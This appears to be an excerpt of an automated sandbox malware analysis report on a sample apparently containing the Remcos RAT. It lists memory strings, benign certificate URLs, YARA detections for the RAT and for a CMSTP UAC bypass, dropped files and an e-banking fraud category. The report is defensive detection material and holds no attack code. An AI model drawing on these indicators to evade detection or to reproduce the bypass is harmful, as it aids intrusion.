                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://support.datanumen.com
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003511000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.000000000559F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D26000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.0000000005580000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repairfile.com
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: svchost.exe, 00000013.00000003.2841725862.000001E28ADAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                      Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA704EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,15_2_6FA704EE
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C5404EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,16_2_6C5404EE
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD104EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,20_2_6FD104EE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.3213673292.0000000002F1F000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

                      System Summary

                      barindex
                      Source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
